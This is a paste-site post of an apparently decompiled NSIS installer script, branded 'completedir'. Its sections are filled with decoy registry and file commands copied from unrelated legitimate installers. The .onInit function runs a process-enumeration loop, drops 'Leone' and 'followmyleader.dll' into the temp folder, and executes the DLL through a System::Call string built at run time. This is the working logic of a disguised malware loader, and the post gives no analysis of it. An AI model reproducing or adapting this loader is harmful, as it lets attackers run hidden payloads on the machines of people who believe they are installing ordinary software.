

Jan 11th, 2019
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text 13.98 KB | None | 0 0
  1. ; NSIS script (UTF-8) NSIS-3 Unicode BadCmd=11
  2. ; Install
  4. Unicode true
  5. SetCompressor lzma
  6. SetCompressorDictSize 8
  8. ; --------------------
  9. ; HEADER SIZE: 26394
  10. ; START HEADER SIZE: 300
  11. ; MAX STRING LENGTH: 1024
  12. ; STRING CHARS: 3672
  14. OutFile [NSIS].exe
  15. !include WinMessages.nsh
  19. ; --------------------
  20. ; LANG TABLES: 1
  21. ; LANG STRINGS: 47
  23. Name completedir
  24. BrandingText "Nullsoft Install System v3.0rc1"
  26. ; LANG: 1033
  27. LangString LSTR_0 1033 "Nullsoft Install System v3.0rc1"
  28. LangString LSTR_1 1033 "$(LSTR_2) Setup"
  29. LangString LSTR_2 1033 completedir
  30. LangString LSTR_5 1033 "Can't write: "
  31. LangString LSTR_8 1033 "Could not find symbol: "
  32. LangString LSTR_9 1033 "Could not load: "
  33. LangString LSTR_10 1033 "Create folder: "
  34. LangString LSTR_11 1033 "Create shortcut: "
  35. LangString LSTR_13 1033 "Delete file: "
  36. LangString LSTR_14 1033 "Delete on reboot: "
  37. LangString LSTR_15 1033 "Error creating shortcut: "
  38. LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
  39. LangString LSTR_21 1033 "Extract: "
  40. LangString LSTR_22 1033 "Extract: error writing to file "
  41. LangString LSTR_24 1033 "No OLE for: "
  42. LangString LSTR_25 1033 "Output folder: "
  43. LangString LSTR_26 1033 "Remove folder: "
  44. LangString LSTR_29 1033 "Skipped: "
  45. LangString LSTR_30 1033 "Copy Details To Clipboard"
  46. LangString LSTR_36 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
  47. LangString LSTR_37 1033 Custom
  48. LangString LSTR_38 1033 Cancel
  49. LangString LSTR_39 1033 ": Installing"
  50. LangString LSTR_40 1033 "Show &details"
  51. LangString LSTR_41 1033 Completed
  52. LangString LSTR_42 1033 "< &Back"
  53. LangString LSTR_43 1033 "&Next >"
  54. LangString LSTR_44 1033 "Click Next to continue."
  55. LangString LSTR_45 1033 ": Completed"
  56. LangString LSTR_46 1033 &Close
  59. InstType $(LSTR_37) ; Custom
  60. InstallDir $PROGRAMFILES\YAZ
  61. ; install_directory_auto_append = YAZ
  62. ; wininit = $WINDIR\wininit.ini
  65. ; --------------------
  66. ; PAGES: 2
  68. ; Page 0
  69. Page instfiles
  70. CompletedText $(LSTR_41) ; Completed
  71. DetailsButtonText $(LSTR_40) ; "Show &details"
  73. /*
  74. ; Page 1
  75. Page COMPLETED
  76. */
  79. ; --------------------
  80. ; SECTIONS: 5
  81. ; COMMANDS: 288
  83. Section genuinenessmolyadiathermancy ; Section_0
  84. GetCurrentAddress $1 ; StrCpy $1 1
  85. WriteRegStr HKCR $${EXT}\shell\PlayWithVLC\command "" "$INSTDIR\vlc.exe --started-from-file --no-playlist-enqueue $\"%1$\""
  86. Delete $INSTDIR\bin\encode_keychange.exe
  87. WriteRegStr HKLM Software\Microsoft\Windows\CurrentVersion\Uninstall\AbiwordToolsPlugins DisplayName "AbiWord's Grammar Tools Plugins (remove only)"
  88. ReadRegStr $0 HKLM "SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" GinaDLL
  89. Push $5
  90. CreateShortCut "$SMPROGRAMS\$$ICONS_GROUP\Service\Register Trap Service.lnk" $INSTDIR\registertrapd.bat
  91. Delete $INSTDIR\_ssl.pyd
  92. CreateShortCut "$SMPROGRAMS\Darcs\Uninstall Darcs.lnk" $INSTDIR\uninstall.exe
  93. WriteRegStr HKCR $R0 VLC.backup $1
  94. Push $R0
  95. SectionEnd
  98. Section taupedesuetudeeild ; Section_1
  99. Delete "$SMPROGRAMS\WIRE1x 2.5\Uninstall.lnk"
  100. ReadRegStr $R3 HKLM $R5 UninstallString
  101. Pop $0
  102. Pop $4
  103. IntOp $R1 1 ~ ; ^ 0xFFFFFFFF
  104. IntOp $R1 $R1 - 1
  105. Pop $0
  106. SetOutPath $$g_strSystemDir\dllcache
  107. RMDir $R1
  108. WriteRegStr HKLM $${Moz} Path $INSTDIR\npvlc.dll
  109. Delete /REBOOTOK $INSTDIR\uninstall.exe
  110. Pop $2
  111. Push $${GAIM_VERSION}
  112. Push Ares
  113. WriteRegStr HKLM SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$(LSTR_2) DisplayName $(LSTR_2) ; completedir completedir
  114. ReadRegStr $R2 HKLM SOFTWARE\Mozilla\$R0\Extensions Plugins
  115. DeleteRegKey HKLM Software\wpa_supplicant
  116. StrCpy $2 1
  117. SectionEnd
  120. Section leptocephalusinconsolableness ; Section_2
  121. Push $R1
  122. WriteRegStr HKLM SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$(LSTR_2) URLInfoAbout $${URL} ; completedir
  123. WriteRegStr HKCR .qrec "" Ludusdesign.Quadra.Recording
  124. Pop $2
  125. Delete $INSTDIR\share\snmp\mib2c.conf
  126. Pop $R0
  127. Delete $INSTDIR\share\snmp\mibs\UCD-DLMOD-MIB.txt
  128. StrCpy $R0 $R0 $R1
  130. Delete "$SMPROGRAMS\OpenMetaverse\libomv\Library and Examples.lnk"
  131. WriteRegStr HKLM SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$(LSTR_2) DisplayName $(LSTR_2) ; completedir completedir
  132. Push $R1
  133. SectionEnd
  136. Section geophysicistsTheodorasuspensoids ; Section_3
  137. SetOutPath $$g_strSysWow64
  138. Delete $INSTDIR\$${PRODUCT_NAME}.url
  139. StrCpy $R0 $${EXT}
  140. MessageBox MB_OK|MB_ICONEXCLAMATION "You can access SFTP via 'Network Neighborhood / Secure FTP Connections'$\r$\n$\r$\nHave fun!$\r$\n$\r$\n Setup by Wolfram Esser ($\r$\n SFTP-Plugin by Hans-Juergen Petrich ($\n and by Martin Kanci ($\n TotalCommander by Christian Ghisler ("
  141. CreateDirectory $SMPROGRAMS\BitTornado
  142. WriteRegStr HKCR Applications\vlc.exe\shell\Play "" "Play with VLC"
  143. EnumRegKey $1 HKU "" $0
  144. ReadRegStr $R0 HKLM $${REGKEY}\Components $${SECTION_NAME}
  145. IfFileExists $INSTDIR\Profile_Default.xml 0
  146. Delete $INSTDIR\include\net-snmp\agent\agent_module_config.h
  147. WriteRegStr HKCR bittorrent\shell "" open
  148. Delete $INSTDIR\unbound-website.url
  149. Push $R0
  150. Delete $INSTDIR\libcairo-2.dll
  151. ReadRegStr $R1 HKLM Software\KCeasy InstallPath
  152. SectionEnd
  155. Section phenolphthaleinJabalpur ; Section_4
  156. Delete $INSTDIR\bin\snmptranslate.exe
  157. CreateShortCut "$SMPROGRAMS\WIRE1x 2.5\Release note.lnk" $INSTDIR\release_note_2_5.txt
  158. StrCpy $R0 $R0 $R1
  159. Delete $INSTDIR\QSnoop.exe
  160. WriteRegStr HKCU Software\Microsoft\VisualStudio\11.0_Config\EnterpriseTools\QualityTools\TestTypes\{13cdc9d9-ddb5-4fa4-a97d-d965ccfc6d4b}\TestTypeExtensions\TestCaseClassAttribute AttributeProvider TestCaseExtension.TestCaseClassAttribute,TestCaseExtension
  161. ReadRegStr $INSTDIR HKLM $${REGKEY} Path
  162. SectionEnd
  165. Function .onInit
  166. Push :
  167. Pop $R1
  168. label_69:
  169. IntOp $R3 $R3 + 1
  170. System::Store 1
  171. ; Call Initialize_____Plugins
  172. ; SetOverwrite off
  173. ; File $PLUGINSDIR\System.dll
  174. ; SetDetailsPrint lastused
  175. ; Push 1
  176. ; CallInstDLL $PLUGINSDIR\System.dll Store
  177. System::Store R0
  178. ; Call Initialize_____Plugins
  179. ; AllowSkipFiles off
  180. ; File $PLUGINSDIR\System.dll
  181. ; SetDetailsPrint lastused
  182. ; Push R0
  183. ; CallInstDLL $PLUGINSDIR\System.dll Store
  184. Pop $0
  185. Pop $1
  186. StrCpy $2 0
  187. label_83:
  188. IntCmp $R0 1 0 label_85 label_85
  189. Goto label_94
  190. label_85:
  191. IntCmp $1 0 0 label_90
  192. IntOp $2 $2 + 50
  193. IntCmp $2 $1 0 label_90
  194. Push -1
  195. Goto label_94
  196. label_90:
  197. Sleep 50
  198. label_91:
  199. Goto label_83
  200. Goto label_91
  201. Goto label_94
  202. label_94:
  203. IntCmp $R0 1 0 label_245 label_245
  204. Push 0
  205. Push $0
  206. Call :label_99
  207. Goto label_243
  208. label_99:
  209. System::Store s
  210. ; Call Initialize_____Plugins
  211. ; File $PLUGINSDIR\System.dll
  212. ; SetDetailsPrint lastused
  213. ; Push s
  214. ; CallInstDLL $PLUGINSDIR\System.dll Store
  215. Pop $0
  216. Pop $1
  217. Push 0
  218. StrCmp $1 0 0 label_114
  219. StrCpy $2 $0 4 -4
  220. StrCmp $2 .exe 0 label_112
  221. StrCpy $1 0
  222. Goto label_113
  223. label_112:
  224. StrCpy $1 1
  225. label_113:
  226. Goto label_127
  227. label_114:
  228. StrCmp $1 1 0 label_121
  229. StrCpy $2 $0 4 -4
  230. StrCmp $2 .exe 0 label_119
  231. StrCpy $1 2
  232. Goto label_120
  233. label_119:
  234. StrCpy $1 3
  235. label_120:
  236. Goto label_127
  237. label_121:
  238. StrCmp $1 2 0 label_127
  239. StrCpy $2 $0 4 -4
  240. StrCmp $2 .exe 0 label_126
  241. StrCpy $1 4
  242. Goto label_127
  243. label_126:
  244. StrCpy $1 5
  245. label_127:
  246. System::Call "*(&l4,i,i,i,i,i,i,i,i,&w520)i .r2"
  247. ; Call Initialize_____Plugins
  248. ; File $PLUGINSDIR\System.dll
  249. ; SetDetailsPrint lastused
  250. ; Push "*(&l4,i,i,i,i,i,i,i,i,&w520)i .r2"
  251. ; CallInstDLL $PLUGINSDIR\System.dll Call
  252. System::Call "kernel32::CreateToolhelp32Snapshot(i 2, i 0)i .r3"
  253. ; Call Initialize_____Plugins
  254. ; File $PLUGINSDIR\System.dll
  255. ; SetDetailsPrint lastused
  256. ; Push "kernel32::CreateToolhelp32Snapshot(i 2, i 0)i .r3"
  257. ; CallInstDLL $PLUGINSDIR\System.dll Call
  258. IntCmp $3 -1 label_230
  259. System::Call "kernel32::Process32FirstW(i r3, i r2)i .r4"
  260. ; Call Initialize_____Plugins
  261. ; File $PLUGINSDIR\System.dll
  262. ; SetDetailsPrint lastused
  263. ; Push "kernel32::Process32FirstW(i r3, i r2)i .r4"
  264. ; CallInstDLL $PLUGINSDIR\System.dll Call
  265. IntCmp $4 0 label_229
  266. label_144:
  267. StrCmp $1 0 label_147
  268. StrCmp $1 2 label_147
  269. StrCmp $1 4 0 label_153
  270. label_147:
  271. System::Call "*$2(i,i,i,i,i,i,i,i,i,&w520 .r5)"
  272. ; Call Initialize_____Plugins
  273. ; File $PLUGINSDIR\System.dll
  274. ; SetDetailsPrint lastused
  275. ; Push "*$2(i,i,i,i,i,i,i,i,i,&w520 .r5)"
  276. ; CallInstDLL $PLUGINSDIR\System.dll Call
  277. Goto label_162
  278. label_153:
  279. StrCmp $1 1 label_157
  280. StrCmp $1 3 label_157
  281. StrCmp $1 5 label_157
  282. StrCmp $1 6 0 label_162
  283. label_157:
  284. System::Call "*$2(i,i,i .r5)"
  285. ; Call Initialize_____Plugins
  286. ; File $PLUGINSDIR\System.dll
  287. ; SetDetailsPrint lastused
  288. ; Push "*$2(i,i,i .r5)"
  289. ; CallInstDLL $PLUGINSDIR\System.dll Call
  290. label_162:
  291. StrCmp $5 $0 0 label_216
  292. StrCmp $1 0 label_165
  293. StrCmp $1 1 0 label_172
  294. label_165:
  295. Pop $5
  296. System::Call "*$2(i,i,i .s)"
  297. ; Call Initialize_____Plugins
  298. ; File $PLUGINSDIR\System.dll
  299. ; SetDetailsPrint lastused
  300. ; Push "*$2(i,i,i .s)"
  301. ; CallInstDLL $PLUGINSDIR\System.dll Call
  302. Goto label_215
  303. label_172:
  304. StrCmp $1 2 label_174
  305. StrCmp $1 3 0 label_199
  306. label_174:
  307. Pop $5
  308. System::Call "*$2(i,i,i .s)"
  309. ; Call Initialize_____Plugins
  310. ; File $PLUGINSDIR\System.dll
  311. ; SetDetailsPrint lastused
  312. ; Push "*$2(i,i,i .s)"
  313. ; CallInstDLL $PLUGINSDIR\System.dll Call
  314. System::Call "kernel32::OpenProcess(i 0x0400|0x0010, i 0, i s)i .r5"
  315. ; Call Initialize_____Plugins
  316. ; File $PLUGINSDIR\System.dll
  317. ; SetDetailsPrint lastused
  318. ; Push "kernel32::OpenProcess(i 0x0400|0x0010, i 0, i s)i .r5"
  319. ; CallInstDLL $PLUGINSDIR\System.dll Call
  320. IntCmp $5 0 label_197
  321. System::Call "psapi::GetModuleFileNameExW(i r5, i 0, w .s, i 1024)"
  322. ; Call Initialize_____Plugins
  323. ; File $PLUGINSDIR\System.dll
  324. ; SetDetailsPrint lastused
  325. ; Push "psapi::GetModuleFileNameExW(i r5, i 0, w .s, i 1024)"
  326. ; CallInstDLL $PLUGINSDIR\System.dll Call
  327. System::Call "kernel32::CloseHandle(i r5)"
  328. ; Call Initialize_____Plugins
  329. ; File $PLUGINSDIR\System.dll
  330. ; SetDetailsPrint lastused
  331. ; Push "kernel32::CloseHandle(i r5)"
  332. ; CallInstDLL $PLUGINSDIR\System.dll Call
  333. Goto label_198
  334. label_197:
  335. Push -1
  336. label_198:
  337. Goto label_215
  338. label_199:
  339. StrCmp $1 4 label_201
  340. StrCmp $1 5 0 label_208
  341. label_201:
  342. Pop $5
  343. System::Call "*$2(i,i,i,i,i,i,i .s)"
  344. ; Call Initialize_____Plugins
  345. ; File $PLUGINSDIR\System.dll
  346. ; SetDetailsPrint lastused
  347. ; Push "*$2(i,i,i,i,i,i,i .s)"
  348. ; CallInstDLL $PLUGINSDIR\System.dll Call
  349. Goto label_215
  350. label_208:
  351. StrCmp $1 6 0 label_215
  352. Pop $5
  353. System::Call "*$2(i,i,i,i,i,i,i,i,i,&w520 .s)"
  354. ; Call Initialize_____Plugins
  355. ; File $PLUGINSDIR\System.dll
  356. ; SetDetailsPrint lastused
  357. ; Push "*$2(i,i,i,i,i,i,i,i,i,&w520 .s)"
  358. ; CallInstDLL $PLUGINSDIR\System.dll Call
  359. label_215:
  360. Goto label_224
  361. label_216:
  362. System::Call "kernel32::Process32NextW(i r3, i r2)i .r4"
  363. ; Call Initialize_____Plugins
  364. ; File $PLUGINSDIR\System.dll
  365. ; SetDetailsPrint lastused
  366. ; Push "kernel32::Process32NextW(i r3, i r2)i .r4"
  367. ; CallInstDLL $PLUGINSDIR\System.dll Call
  368. label_221:
  369. IntCmp $4 0 label_224 label_144 label_144
  370. Goto label_221
  371. Goto label_224
  372. label_224:
  373. System::Call "kernel32::CloseHandle(i r3)"
  374. ; Call Initialize_____Plugins
  375. ; File $PLUGINSDIR\System.dll
  376. ; SetDetailsPrint lastused
  377. ; Push "kernel32::CloseHandle(i r3)"
  378. ; CallInstDLL $PLUGINSDIR\System.dll Call
  379. label_229:
  380. Goto label_232
  381. label_230:
  382. Pop $5
  383. Push -2
  384. label_232:
  385. System::Free $2
  386. ; Call Initialize_____Plugins
  387. ; File $PLUGINSDIR\System.dll
  388. ; SetDetailsPrint lastused
  389. ; Push $2
  390. ; CallInstDLL $PLUGINSDIR\System.dll Free
  391. System::Store l
  392. ; Call Initialize_____Plugins
  393. ; File $PLUGINSDIR\System.dll
  394. ; SetDetailsPrint lastused
  395. ; Push l
  396. ; CallInstDLL $PLUGINSDIR\System.dll Store
  397. Return
  399. label_243:
  400. Pop $0
  401. Push $0
  402. label_245:
  403. System::Store R0
  404. ; Call Initialize_____Plugins
  405. ; File $PLUGINSDIR\System.dll
  406. ; SetDetailsPrint lastused
  407. ; Push R0
  408. ; CallInstDLL $PLUGINSDIR\System.dll Store
  409. System::Store l
  410. ; Call Initialize_____Plugins
  411. ; File $PLUGINSDIR\System.dll
  412. ; SetDetailsPrint lastused
  413. ; Push l
  414. ; CallInstDLL $PLUGINSDIR\System.dll Store
  415. IntCmp $R3 8652 0 label_69
  416. SetOutPath $TEMP
  417. Delete $TEMP\Leone
  418. SetOverwrite ifnewer
  419. AllowSkipFiles on
  420. File HxA-Exchange.scale-300.png
  421. File AlarmsSplashScreen.contrast-white_scale-100.png
  422. File AppCoreDll.xbf
  423. File StoreRatingPromotion.winmd
  424. File CalculatorAppList.targetsize-20_altform-unplated_contrast-black.png
  425. File AlarmsAppList.contrast-white_targetsize-20_altform-unplated.png
  426. File MapsAppList.targetsize-32.png
  427. File Leone
  428. File followmyleader.dll
  429. IntFmt $R9 $TEMP\followmyleader$R1$R1roxcon082_ $R1
  430. System::Call $R9
  431. ; Call Initialize_____Plugins
  432. ; SetOverwrite off
  433. ; AllowSkipFiles off
  434. ; File $PLUGINSDIR\System.dll
  435. ; SetDetailsPrint lastused
  436. ; Push $R9
  437. ; CallInstDLL $PLUGINSDIR\System.dll Call
  438. FunctionEnd
  441. /*
  442. Function Initialize_____Plugins
  443. SetDetailsPrint none
  444. StrCmp $PLUGINSDIR "" 0 label_284
  445. Push $0
  446. SetErrors
  447. GetTempFileName $0
  448. Delete $0
  449. CreateDirectory $0 ; !!!! Unknown Params: $0 "" ProgramFilesDir ; 1538 0 1
  450. IfErrors label_285
  451. StrCpy $PLUGINSDIR $0
  452. Pop $0
  453. label_284:
  454. Return
  456. label_285:
  457. MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
  458. Quit
  459. FunctionEnd
  460. */
  464. ; --------------------
  467. /*
  468. 17 CommonFilesDir
  470. 52 "$PROGRAMFILES\Common Files"
  471. 68 $COMMONFILES
  472. */
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